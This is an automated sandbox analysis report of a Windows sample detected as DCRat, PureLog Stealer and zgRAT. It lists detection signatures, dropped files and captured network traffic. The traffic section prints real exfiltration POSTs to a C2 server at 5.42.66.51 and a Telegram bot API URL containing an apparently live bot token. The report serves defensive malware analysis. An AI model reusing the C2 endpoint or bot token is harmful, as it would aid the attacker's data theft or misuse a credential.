Windows Analysis Report
d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe

Overview

General Information

Sample name: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
Analysis ID: 1531798
MD5: 670861d1059f9baf2a8525097157d1c2
SHA1: f7007917499121cd5107697593a9429911ae0e77
SHA256: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647caa476557eedb53f97c4
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Avira: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\WmiPrvSE.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe ReversingLabs: Detection: 87%
Source: C:\Recovery\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe ReversingLabs: Detection: 87%
Source: C:\Recovery\WmiPrvSE.exe ReversingLabs: Detection: 87%
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\Desktop\ArFrORkS.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\EhviVOkL.log ReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\KIRpkYvx.log ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\QyIevzpi.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\VWRNVcdg.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\fTGLCVSM.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\hILtgrfA.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\sBnSdgqk.log ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\uDZAyPvf.log ReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\wjuqGuQY.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Downloads\smartscreen.exe ReversingLabs: Detection: 87%
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe ReversingLabs: Detection: 87%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Joe Sandbox ML: detected
Source: C:\Recovery\WmiPrvSE.exe Joe Sandbox ML: detected
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Joe Sandbox ML: detected
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 0_2_00007FF848FAD35D

Networking

Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49798 -> 5.42.66.51:80
Source: Network traffic Suricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.5:49896 -> 5.42.66.51:80
Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1 Host: ipinfo.io
Source: global traffic HTTP traffic detected: POST /bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="34997188-a42f-41eb-990d-cfd33339eec7" Host: api.telegram.org Content-Length: 86200 Expect: 100-continue Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 34.117.59.81
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: ipinfo.io
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49705 -> 34.117.59.81:443
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 5.42.66.51 Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 5.42.66.51 Content-Length: 384 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 5.42.66.51 Content-Length: 2552 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 5.42.66.51 Content-Length: 2052 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 5.42.66.51 Content-Length: 2052 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 5.42.66.51 Content-Length: 2552 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----I9nNPSHYdg1RY1Gju0uTq58PsHKk1qoBdy User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 5.42.66.51 Content-Length: 119102 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 5.42.66.51 Content-Length: 2156 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 5.42.66.51 Content-Length: 2140 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 5.42.66.51 Content-Length: 2128 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 5.42.66.51 Content-Length: 2544 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 5.42.66.51 Content-Length: 2156 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 5.42.66.51 Content-Length: 2548 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2128Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2128Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2548Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2548Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2140Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2128Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
